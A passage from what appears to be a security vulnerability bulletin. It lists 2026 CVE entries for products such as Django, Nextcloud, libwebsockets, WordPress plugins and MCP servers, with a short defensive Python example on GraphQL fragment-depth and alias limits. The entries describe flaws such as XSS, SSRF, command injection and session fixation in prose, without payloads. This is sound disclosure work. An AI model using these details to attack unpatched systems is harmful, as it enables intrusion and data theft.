| tittuvarghese--CollegeManagementSystem | A flaw has been found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. This impacts the function session_start of the file /login-form.php. Executing a manipulation of the argument UserAuthData can lead to session fixation. The attack can be launched remotely. The exploit has been published and may be used. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 6.3 | CVE-2026-11335 |
| tittuvarghese--CollegeManagementSystem | A vulnerability has been found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. Affected is an unknown function of the file dashboard_page/admin_page.php of the component Admin Interface. The manipulation of the argument UserAuthData leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 6.3 | CVE-2026-11336 |
| tittuvarghese--CollegeManagementSystem | A vulnerability was found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. Affected by this vulnerability is an unknown functionality of the file /dashboard_page/forms/fetch.php. The manipulation of the argument department_name results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 4.3 | CVE-2026-11337 |
| Trac d.o.o.--PDBM | The PDBM application relies on a static, hard‑coded secret embedded in the PDBM.exe executable. This secret is used by the application's encryption routines, including the function responsible for decrypting credentials stored in the product's configuration file. Because the secret is constant across installations, any attacker with sufficient local privileges can extract it from the binary. Once obtained, the secret allows the attacker to decrypt the stored password and authenticate as the user defined in the configuration file. In the affected version, this user account is configured with administrative privileges, granting full access to PDBM's management interface and its underlying operational functions. | 2026-06-01 | 6.4 | CVE-2026-25600 |
| vertex-app--vertex | A vulnerability was identified in vertex-app vertex up to 2026.02.12. This issue affects some unknown processing of the file app/model/LogMod.js of the component Log Viewer Endpoint. Such manipulation of the argument req.query leads to os command injection. The attack can be executed remotely. The exploit is publicly available and might be used. The name of the patch is 805d82e7100d49b79b3beb1b9420e8e458987198. It is best practice to apply a patch to resolve this issue. | 2026-06-06 | 6.3 | CVE-2026-11408 |
| warmcat--libwebsockets | A flaw has been found in warmcat libwebsockets up to 4.5.8. This issue affects the function lws_ssh_parse_plaintext of the file plugins/protocol_lws_ssh_base/sshd.c of the component SSH Protocol Handler. Executing a manipulation of the argument msg_len can lead to resource consumption. The attack may be launched remotely. The exploit has been published and may be used. This patch is called 3f9f0c6ecaf0e6f3f219d30632c5d1f2479d7498. A patch should be applied to remediate this issue. | 2026-06-02 | 5.3 | CVE-2026-10650 |
| Web-Dorado--Contact Form Maker | Contact Form by WD 1.13.1 contains a cross-site request forgery vulnerability combined with local file inclusion that allows unauthenticated attackers to include arbitrary files by exploiting unsanitized action parameters. Attackers can craft malicious forms targeting the admin-ajax.php endpoint with directory traversal sequences in the GET action parameter to load files via CSRF, bypassing authentication on vulnerable AJAX actions. | 2026-06-04 | 4 | CVE-2019-25734 |
| webvitaly--Page-list | The Page-list plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.2. This is due to the pagelist_unqprfx_ext_shortcode() function (the [pagelist_ext] / [pagelistext] shortcode) accepting attacker-controlled post_status, post_type, and show_meta_key attributes and passing them directly into get_pages() and get_post_meta() with no capability check verifying that the rendering user is permitted to read the matched objects. When the current post has no child pages, the shortcode re-issues the query with child_of => 0, broadening it to every page on the site matching the supplied status/type. This makes it possible for authenticated attackers, with contributor-level access and above, to disclose the titles, body content/excerpts, and arbitrary post meta of unrelated private and draft pages by inserting the shortcode into a contributor-authored draft and previewing it. | 2026-06-06 | 4.3 | CVE-2026-9008 |
| wireapp--wire-ios | wire-ios is an iOS client for the Wire secure messaging application. Prior to version 4.16.0, upon receiving a crafted malicious Proteus external message with an encrypted payload that is shorter than 16 bytes, the Wire iOS client crashes. The crash is triggered automatically on message receipt with no user interaction. Since the malicious message persists in the conversation, the app enters a crash loop on relaunch and cannot be reopened until the local state is wiped. This issue has been fixed in version 4.16.0, which introduces the missing length check and is available via the App Store. No known workarounds are available. | 2026-06-02 | 6.5 | CVE-2026-35049 |
| wonderwhy-er--DesktopCommanderMCP | A vulnerability was identified in wonderwhy-er DesktopCommanderMCP 0.2.37. This affects the function readFileFromUrl of the file src/tools/filesystem.ts of the component read_file. Such manipulation of the argument url leads to server-side request forgery. The attack may be performed from remote. The exploit is publicly available and might be used. The name of the patch is 53699bebba9950047bca16ac4dc8f0568f596aaa. It is best practice to apply a patch to resolve this issue. | 2026-06-02 | 6.3 | CVE-2026-10690 |
| wonderwhy-er--DesktopCommanderMCP | A security flaw has been discovered in wonderwhy-er DesktopCommanderMCP up to 0.2.38. This impacts an unknown function of the file src/search-manager.ts of the component start_search. Performing a manipulation of the argument SearchResult[] results in inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.2.39 will fix this issue. The patch is named 4ce845f8749b6a159b57b38dcc3357f7222a8078. It is suggested to upgrade the affected component. | 2026-06-02 | 4.3 | CVE-2026-10691 |
| wpdevteam--EmbedPress PDF Embedder, Embed PDF viewer, YouTube Videos, 3D FlipBook, Social feeds & more | The EmbedPress - PDF Embedder, Embed PDF viewer, YouTube Videos, 3D FlipBook, Social feeds & more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the block 'url' attribute in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-06 | 6.4 | CVE-2026-7796 |
| wpdevteam--Essential Addons for Elementor Popular Elementor Templates & Widgets | The Essential Addons for Elementor - Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.6.4 via the ajax_load_more function due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2026-06-06 | 5.3 | CVE-2026-7665 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Prior to version 3.12.0, two FastAPI routes that serve per-component static assets in NiceGUI accept a sub-path parameter that may resolve to a directory rather than a file. Requests that resolve to a directory raise an unhandled RuntimeError inside Starlette's FileResponse, which Uvicorn writes to the server log as a full traceback. Because the routes are reachable without authentication, a remote attacker can amplify log volume and consume disk and log-pipeline capacity on any publicly reachable NiceGUI server. This issue has been patched in version 3.12.0. | 2026-06-02 | 5.3 | CVE-2026-45554 |
| zephyrproject-rtos--Zephyr | A potential out-of-bounds write/read exists in the TLS socket connect path of the network sockets subsystem (subsys/net/lib/sockets/sockets_tls.c). When the TLS session cache is enabled, tls_session_store() and tls_session_restore() memcpy the caller-supplied address into a fixed-size buffer using the caller-controlled addrlen value without validating it against the destination size. struct net_sockaddr is an opaque type, so an application can pass an addrlen larger than sizeof(struct net_sockaddr) (for example 128 bytes into a 24-byte stack buffer), causing the memcpy to read and write past the end of the address memory used by the TLS session cache. This out-of-bounds write can lead to a crash and denial of service, and potentially to arbitrary code execution. | 2026-06-04 | 6.3 | CVE-2026-5066 |
| zeshanb--Easy Cart | The Easy Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'add_to_cart' shortcode in all versions up to and including 1.8. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. Specifically, the ectp_add_to_cart() function uses sanitize_text_field() on shortcode attributes like 'itemid', 'product_name', 'product_desc', 'product_qty', and 'price' before inserting them into double-quoted HTML attributes. While sanitize_text_field() strips HTML tags, it does not escape double quote characters, allowing an attacker to break out of the HTML attribute context and inject arbitrary event handlers. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 6.4 | CVE-2026-4080 |
| zeuscart--ZeusCart | ZeusCart 4.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions on behalf of victims by crafting malicious requests. Attackers can deactivate customer accounts via the admin interface by tricking users into visiting attacker-controlled pages that submit requests to the regstatus endpoint with action=deny parameters. | 2026-06-01 | 5.3 | CVE-2018-25435 |
| zilliztech--deep-searcher | A weakness has been identified in zilliztech deep-searcher up to 0.0.2. This affects the function CollectionRouter.invoke of the file deepsearcher/agent/collection_router.py. This manipulation of the argument kwargs causes improper access controls. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-06-07 | 5.4 | CVE-2026-11466 |
| Znuny--Znuny | In Znuny LTS before 6.5.21 and Znuny before 7.3.3, there is reflected XSS in AdminCommunicationLog (aka the communication log administration view). | 2026-06-05 | 6.4 | CVE-2026-50592 |
| Znuny--Znuny | In Znuny LTS before 6.5.21 and Znuny before 7.3.3, XSS can occur via stored user preferences. | 2026-06-05 | 5.4 | CVE-2026-50591 |
| Zyxel--VMG4005-B50B firmware | A buffer overflow vulnerability in the UPnP AddPortMapping() command in Zyxel VMG4005-B50B firmware versions through 5.13(ABRL.5.4)C0 could allow an adjacent attacker to trigger a temporary denial-of-service (DoS) condition affecting the UPnP function of the affected device. | 2026-06-02 | 6.5 | CVE-2026-3870 |
| Zyxel--VMG4005-B50B firmware | A buffer overflow vulnerability in the UPnP DeletePortMapping() command in Zyxel VMG4005-B50B firmware versions through 5.13(ABRL.5.4)C0 could allow an adjacent attacker to trigger a temporary denial-of-service (DoS) condition affecting the UPnP function of the affected device. | 2026-06-02 | 6.5 | CVE-2026-3871 |
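
The two Strawberry GraphQL entries above (CVE-2026-47706 and CVE-2026-47707) describe two limiter failures with one root cause: fragment spreads are followed during execution but not accounted for during validation. The following is an added example, not Strawberry's code and not the reporters' proof of concept. It models a GraphQL document as a small dict-based AST (constructed here; graphql-core is not used) and shows a depth check that rejects circular spreads instead of recursing until RecursionError, beside an alias count computed on the expanded selection set rather than on the source text.

```python
"""Added example: validation-time limiters over a simplified GraphQL AST.

Two checks on a constructed dict-based AST (not graphql-core, not
Strawberry's own code):
  * depth measurement that detects circular fragment spreads instead of
    recursing until RecursionError;
  * alias counting that expands fragment spreads, so a small fragment
    spread many times is counted by its executed size, not its source size.
"""
from typing import Dict, FrozenSet, List, Optional

FIELD = "field"
SPREAD = "fragment_spread"


def field(name: str, alias: Optional[str] = None, selections: Optional[List[dict]] = None) -> dict:
    """Constructed AST node: a field with an optional alias and sub-selection."""
    return {"kind": FIELD, "name": name, "alias": alias, "selections": selections or []}


def spread(fragment_name: str) -> dict:
    """Constructed AST node: `...FragmentName`."""
    return {"kind": SPREAD, "name": fragment_name}


class CircularFragmentError(ValueError):
    """Raised when a fragment spread (transitively) spreads itself."""


def _resolve_spread(node: dict, fragments: Dict[str, List[dict]], visiting: FrozenSet[str]):
    name = node["name"]
    if name in visiting:
        raise CircularFragmentError(f"fragment cycle through {name!r}")
    if name not in fragments:
        raise ValueError(f"unknown fragment {name!r}")
    return fragments[name], visiting | {name}


def determine_depth(selections, fragments, visiting: FrozenSet[str] = frozenset()) -> int:
    """Maximum field nesting. A spread contributes its fragment body's depth
    without adding a level; `visiting` holds the spreads on the current path,
    which is the bookkeeping the unpatched limiter lacked."""
    depth = 0
    for node in selections:
        if node["kind"] == FIELD:
            depth = max(depth, 1 + determine_depth(node["selections"], fragments, visiting))
        else:
            body, path = _resolve_spread(node, fragments, visiting)
            depth = max(depth, determine_depth(body, fragments, path))
    return depth


def count_aliases_static(selections, fragments) -> int:
    """Vulnerable approach: count alias nodes as written in the document,
    each fragment body once, ignoring how often it is spread."""
    def walk(nodes) -> int:
        return sum((n["alias"] is not None) + walk(n["selections"]) for n in nodes if n["kind"] == FIELD)
    return walk(selections) + sum(walk(body) for body in fragments.values())


def count_aliases_expanded(selections, fragments, visiting: FrozenSet[str] = frozenset()) -> int:
    """Fixed approach: follow every spread, so a fragment's aliases are
    counted once per expansion, matching what execution will resolve."""
    total = 0
    for node in selections:
        if node["kind"] == FIELD:
            total += (node["alias"] is not None)
            total += count_aliases_expanded(node["selections"], fragments, visiting)
        else:
            body, path = _resolve_spread(node, fragments, visiting)
            total += count_aliases_expanded(body, fragments, path)
    return total


def validate(selections, fragments, max_depth: int, max_aliases: int) -> List[str]:
    """Run both limiters; a cycle becomes a validation error, not a crash."""
    try:
        depth = determine_depth(selections, fragments)
        aliases = count_aliases_expanded(selections, fragments)
    except CircularFragmentError as exc:
        return [str(exc)]
    errors = []
    if depth > max_depth:
        errors.append(f"query depth {depth} exceeds limit {max_depth}")
    if aliases > max_aliases:
        errors.append(f"query uses {aliases} aliases after fragment expansion, limit {max_aliases}")
    return errors


# Constructed document 1: fragment A spreads B and B spreads A.
CYCLIC_FRAGMENTS = {"A": [field("id"), spread("B")], "B": [field("name"), spread("A")]}
CYCLIC_QUERY = [field("user", selections=[spread("A")])]

# Constructed document 2: a 3-alias fragment spread under 4 aliased fields.
AMP_FRAGMENTS = {"F": [field("name", alias=f"n{i}") for i in range(3)]}
AMP_QUERY = [field("user", alias=f"u{i}", selections=[spread("F")]) for i in range(4)]

if __name__ == "__main__":
    print(validate(CYCLIC_QUERY, CYCLIC_FRAGMENTS, max_depth=10, max_aliases=10))
    print(count_aliases_static(AMP_QUERY, AMP_FRAGMENTS),      # 7: what the source text shows
          count_aliases_expanded(AMP_QUERY, AMP_FRAGMENTS))    # 16: what execution resolves
```

The static count sees 7 aliases in the second document while execution resolves 16; a limit of 10 passes the first count and fails the second. The `visiting` set is per path, not global, so a fragment legitimately spread in two sibling branches is still accepted.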

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1Panel-dev--CordysCRM | A security vulnerability has been detected in 1Panel-dev CordysCRM up to 1.4.1. This impacts the function Save of the file src/main/java/cn/cordys/crm/system/service/ModuleFormService.java of the component ModuleFormController. The manipulation of the argument Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 1.7.0 will fix this issue. The identifier of the patch is c87682afa8df79853299f75489c9d333f7bc5fce. Upgrading the affected component is recommended. | 2026-06-02 | 3.5 | CVE-2026-10567 |
| 1Panel-dev--CordysCRM | A vulnerability has been found in 1Panel-dev CordysCRM up to 1.6.2. This affects an unknown function of the file backend/framework/src/main/java/cn/cordys/config/RequestParamTrimConfig.java. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. Upgrading to version 1.7.0 mitigates this issue. The identifier of the patch is c87682afa8df79853299f75489c9d333f7bc5fce. It is suggested to upgrade the affected component. | 2026-06-01 | 2.4 | CVE-2026-10514 |
| Aiven-Open--klaw | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, a vulnerability exists in the user registration and login mechanisms due to inconsistent handling of username case sensitivity, leading to a targeted Denial of Service (DoS) and complete account lockout. This issue has been patched in version 2.10.4. | 2026-06-02 | 2.7 | CVE-2026-44367 |
| Assimp--Assimp | A security vulnerability has been detected in Assimp up to 6.0.4. Affected by this issue is the function HL1MDLLoader::read_sequence_infos of the file HL1MDLLoader.cpp of the component Half-Life 1 MDL Loader. The manipulation of the argument aiString leads to out-of-bounds read. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The project tagged the reported issue as bug. | 2026-06-01 | 3.3 | CVE-2026-10233 |
| bytedance--InfiniStore | A vulnerability was found in bytedance InfiniStore up to 0.2.33. The impacted element is the function purge_kv_map in the library /src/infinistore.h of the component KV Map Handler. Performing a manipulation results in inefficient algorithmic complexity. The attack requires a local approach. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 3.3 | CVE-2026-11312 |
| cilium--ebpf | A vulnerability has been found in cilium ebpf up to 0.21.0. This affects the function loadRawSpec of the file btf/btf.go of the component LoadCollectionSpec/LoadCollectionSpecFromReader. Such manipulation of the argument offset leads to integer overflow. The attack can only be performed from a local environment. The exploit has been disclosed to the public and may be used. The name of the patch is 533dfc82fd228bfadf42ea7180c39de7d9af47fa. A patch should be applied to remediate this issue. | 2026-06-03 | 3.3 | CVE-2026-10722 |
| code-projects--Online Hospital Management System | A weakness has been identified in code-projects Online Hospital Management System 1.0. This issue affects some unknown processing of the file viewdoctortimings.php. This manipulation of the argument delid causes improper control of resource identifiers. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 3.8 | CVE-2026-10299 |
| dask--dask | A flaw has been found in dask up to 3.0. Affected by this issue is the function nunique_approx of the file dask/dataframe/hyperloglog.py of the component HLL Handler. This manipulation causes resource consumption. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The pull request to fix this issue awaits acceptance. | 2026-06-03 | 3.1 | CVE-2026-10705 |
| djangoproject--daphne | daphne before 4.2.2 reconstructs a raw HTTP request from Twisted's parsed headers and feeds it to autobahn for WebSocket handshake processing. Twisted does not treat \x0b, \x0c, \x1c, \x1d, \x1e, or \x85 as header line separators, but autobahn decodes header values to str and calls splitlines(). An attacker can exploit this parser differential to inject additional headers into the ASGI scope passed to the application. daphne now rejects requests with these bytes in any header value with a 400 response. | 2026-06-03 | 3.7 | CVE-2026-44546 |
| djangoproject--Django | An issue was discovered in Django 5.2 before 5.2.15 and 6.0 before 6.0.6. `django.middleware.cache.UpdateCacheMiddleware` in Django does not add `Authorization` to the `Vary` response header for requests bearing that header without `Cache-Control: public`, which allows remote attackers to read private cached responses via unauthenticated requests to the same URL. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Shai Berger for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-35193 |
| djangoproject--Django | An issue was discovered in Django 5.2 before 5.2.15 and 6.0 before 6.0.6. `django.utils.cache.has_vary_header()` in Django does not strip leading or trailing whitespace from `Vary` response header values before comparison, which allows remote attackers to read cached responses via requests to URLs whose responses contain whitespace-padded Vary header values. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Navid Rezazadeh for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-48587 |
| djangoproject--Django | An issue was discovered in Django 6.0 before 6.0.6 and 5.2 before 5.2.15. `django.http.HttpRequest.get_signed_cookie` in Django uses a non-injective salt derivation (concatenating the cookie name and salt argument), which allows a remote attacker to use a cookie in a context different from the one where it was signed, via distinct `(name, salt)` pairs that produce the same concatenation. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Peng Zhou for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-6873 |
| djangoproject--Django | An issue was discovered in Django 6.0 before 6.0.6 and 5.2 before 5.2.15. `django.core.mail.backends.smtp.EmailBackend` in Django fails to prevent reuse of a partially-initialized connection after a failed `STARTTLS` handshake when `fail_silently=True`, which allows on-path network attackers to read email content via cleartext interception. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Kasper Dupont for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-7666 |
| djangoproject--Django | An issue was discovered in Django 5.2 before 5.2.15 and 6.0 before 6.0.6. `django.middleware.cache.UpdateCacheMiddleware` in Django does not match `Cache-Control` response directives case-insensitively, which allows remote attackers to read responses that were incorrectly cached because their `Cache-Control` directives used uppercase or mixed-case values. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Ahmed Badawe for reporting this issue. | 2026-06-03 | 3.1 | CVE-2026-8404 |
| FluentCMS--FluentCMS | A weakness has been identified in FluentCMS 0.0.5. The impacted element is an unknown function of the file /admin/blocks of the component Blocks Plugin. This manipulation causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 2.4 | CVE-2026-11434 |
| ggml-org--whisper.cpp | A security flaw has been discovered in ggml-org whisper.cpp up to 1.8.2. This vulnerability affects the function whisper_model_load of the file ggml/src/ggml.c. The manipulation results in null pointer dereference. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.3 | CVE-2026-10298 |
| gradio-app--gradio | A security flaw has been discovered in gradio-app gradio 6.14.0. This affects the function save_audio_to_cache of the component Audio Cache Key Handler. Performing a manipulation results in use of weak hash. The attack must be initiated from a local position. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The patch is named 13394. To fix this issue, it is recommended to deploy a patch. | 2026-06-03 | 2.5 | CVE-2026-10783 |
| HCL--iControl | HCL iControl was affected by a Missing Cookie Attributes vulnerability. It was observed that the application is missing several critical cookie attributes, including Secure and SameSite, and that the cookie path is set to root. | 2026-06-04 | 3.1 | CVE-2025-52608 |
| HCL--iControl | HCL iControl was affected by a Missing Security Headers vulnerability, which could lead to cross-site scripting (XSS) attacks because the headers that enable the built-in XSS filtering mechanisms of modern web browsers were missing. | 2026-06-04 | 3.7 | CVE-2025-52609 |
| HCL--iControl | HCL iControl v4.0.0 was affected by an Unhandled Exception - Stack Trace Disclosure vulnerability. The error occurs due to an undefined property being accessed in the application's JavaScript code. Specifically, the code attempts to read the property dashboard key from an object that is undefined. This issue likely stems from a missing or improperly initialized object. | 2026-06-04 | 3.1 | CVE-2025-52611 |
| HCL--iReflection | A vulnerable and outdated third-party components issue was detected in the HCL iReflection web application. | 2026-06-02 | 3.1 | CVE-2024-42206 |
| HCLSoftware--BigFix Cloud Lifecycle Management | HCL BigFix Cloud Lifecycle Management is affected by lack of input validation. This low-level flaw allows unauthorized access and may lead to information exposure. | 2026-06-04 | 3.3 | CVE-2025-62338 |
| janet-lang--janet | A security flaw has been discovered in janet-lang janet up to 1.41.0. This affects the function doframe of the file src/core/debug.c. Performing a manipulation results in out-of-bounds read. Attacking locally is a requirement. The exploit has been released to the public and may be used for attacks. The patch is named ed17dd2c5913a23fb1107251e44a9410a3c30cf5. | 2026-06-01 | 3.3 | CVE-2026-10267 |
| janet-lang--janet | A weakness has been identified in janet-lang janet up to 1.41.0. This vulnerability affects the function unmarshal_one_fiber of the file src/core/marsh.c. Executing a manipulation can lead to integer overflow. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. This patch is called d9b1d711ea1fde52ac73a82088b512a3e17bad0d. A patch should be applied to remediate this issue. | 2026-06-01 | 3.3 | CVE-2026-10268 |
| JeecgBoot--JeecgBoot | A vulnerability was identified in JeecgBoot up to 3.9.2. Affected by this vulnerability is the function queryPageList of the file src\main\java\org\jeecg\modules\system\controller\SysUserController.java of the component User List Endpoint. The manipulation of the argument salt leads to information disclosure. The attack may be initiated remotely. The attack is considered to have high complexity. The exploitation appears to be difficult. The exploit is publicly available and might be used. A fix is planned for the upcoming release. | 2026-06-07 | 3.1 | CVE-2026-11464 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, an Insecure Direct Object Reference (IDOR) vulnerability in Kiteworks Secure Data Forms allows an authenticated user to access metadata of resources belonging to other users due to insufficient authorization checks on resource ownership. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 3.7 | CVE-2026-24761 |
| lharries--whatsapp-mcp | A vulnerability was determined in lharries whatsapp-mcp 0.0.1. Affected by this vulnerability is the function SendMessageRequest of the file whatsapp-bridge/main.go of the component Send API Endpoint. This manipulation of the argument mediaPath causes path traversal. The exploit has been publicly disclosed and may be utilized. Patch name: 6657cdceadd361e8fbe824afe9d00b4504009a5d. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 3.5 | CVE-2026-10264 |
| LMCache--LMCache | A flaw has been found in LMCache up to 0.4.6. This affects the function hex_hash_to_int16 of the file lmcache/integration/vllm/utils.py of the component KV Cache Handler. Executing a manipulation can lead to use of weak hash. The attack needs to be launched locally. The attack requires a high level of complexity. It is indicated that the exploitability is difficult. The exploit has been published and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10813 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 9.11 through 26.00 contain a heap out-of-bounds read of up to 3 bytes in the UDF disc image handler's File Identifier Descriptor parser. In CFileId::Parse (CPP/7zip/Archive/Udf/UdfIn.cpp), after validating size < 38 + idLen + impLen and advancing processed to 38 + impLen + idLen, the alignment-padding loop reads p[processed] while incrementing up to 3 times to reach a 4-byte boundary, and the processed <= size bounds check only runs after the loop. When (38 + impLen + idLen) % 4 != 0 and 38 + impLen + idLen == size, the loop reads 1 to 3 bytes past the end of the exact-size heap buffer allocated via buf.Alloc((size_t)item.Size). The UDF handler is registered for .iso and .udf files and auto-detected by signature, and the OOB read triggers during Open() when listing or extracting a crafted UDF image. Impact is limited to information disclosure (a 1-bit oracle per OOB byte via open/fail behavior) and denial of service (crash under hardened allocators); there is no write primitive. Version 26.01 fixes the issue. | 2026-06-05 | 3.1 | CVE-2026-48102 |
| Mettle--sendportal | A vulnerability was detected in Mettle sendportal up to 3.0.1. This affects an unknown part of the file /webview/ of the component Campaign Handler. The manipulation of the argument content results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 3.5 | CVE-2026-10234 |
| MLflow--MLflow | A flaw has been found in MLflow up to 3.10.0. This issue affects the function mlflow.data.digest_utils of the file mlflow/data/digest_utils.py of the component Dataset Digest Computation. This manipulation causes use of weak hash. It is possible to launch the attack on the local host. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-06-04 | 3.6 | CVE-2026-10803 |
| mlrun--mlrun | A vulnerability has been found in mlrun up to 1.12.0-rc3. This impacts the function mlrun.utils.helpers.calculate_dataframe_hash of the file mlrun/utils/helpers.py of the component DataFrame Hash Handler. The manipulation leads to use of weak hash. The attack can only be performed from a local environment. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-03 | 3.6 | CVE-2026-10766 |
| modelscope--ms-swift | A security vulnerability has been detected in modelscope ms-swift up to 4.2.0. This affects the function Template._save_pil_image of the file swift/template/base.py of the component PIL Image Cache Key Handler. The manipulation leads to use of weak hash. An attack has to be approached locally. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit has been disclosed publicly and may be used. The pull request to fix this issue awaits acceptance. | 2026-06-04 | 3.6 | CVE-2026-10801 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 1.15.0 to before 1.15.4, 1.16.0 to before 1.16.3, 1.17.0 to before 1.17.1, and 1.18.0 to before 1.18.1, a malicious user with access to an end-to-end encrypted files drop link was able to also drop files into other end-to-end encrypted folders of the share owner. Reading and modifying of other files was not possible. This issue has been patched in versions 1.15.4, 1.16.3, 1.17.1, 1.18.1, and 2.0.0-rc.7. | 2026-06-01 | 3.5 | CVE-2026-45159 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to versions 21.1.10, 22.0.11, and 23.0.3, a low-privileged user can force other users' microphones to be muted in calls when no High-performance Backend is installed. This issue has been patched in versions 21.1.10, 22.0.11, and 23.0.3. | 2026-06-01 | 3.5 | CVE-2026-45266 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. Prior to version 2.7.2, authenticated users can check if arbitrary files are associated with specific approval workflows where they can request approval. This issue has been patched in version 2.7.2. | 2026-06-01 | 3.3 | CVE-2026-45277 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 6.1.0 to before version 8.2.2, an attacker can craft links that would redirect users to another website when the victim uses the attacker's link to log in via user OIDC. This issue has been patched in version 8.2.2. | 2026-06-01 | 3.3 | CVE-2026-45278 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From version 2.6.0 to before version 4.3.0, when a collective page had previously been deleted and the collective was shared view-only, guests with access to the collective were able to access the deleted pages directly from the trashbin. This issue has been patched in version 4.3.0. | 2026-06-01 | 2.6 | CVE-2026-45154 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.7 and 33.0.0 to before 33.0.1, a missing access check at the API level allowed adding unknown circles by their ID directly to other circles. Since circle IDs have 62^15 complexity by default, this is still unlikely to be executable at will, but if access to an ID was available via another source, memberships could be tracked this way. It is recommended that the Nextcloud Server is upgraded to 32.0.7 or 33.0.1. It is recommended that the Nextcloud Enterprise Server is upgraded to 29.0.16.14, 30.0.17.8, 31.0.14.3, 32.0.7 or 33.0.1. | 2026-06-01 | 2.6 | CVE-2026-45155 |
| onnx--onnx-mlir | A vulnerability has been found in onnx onnx-mlir up to 0.5.0.0. Affected by this issue is the function generate_hash_key of the file src/Runtime/python/torch_onnxmlir/src/torch_onnxmlir/backend.py of the component Placeholder Node Cache Handler. Such manipulation leads to use of weak hash. An attack has to be approached locally. A high complexity level is associated with this attack. The exploitation is known to be difficult. The name of the patch is 72c5187ff6d13c2c2b3d3789b8f5faf99f08a5b4. Applying a patch is advised to resolve this issue. | 2026-06-05 | 3.6 | CVE-2026-11329 |
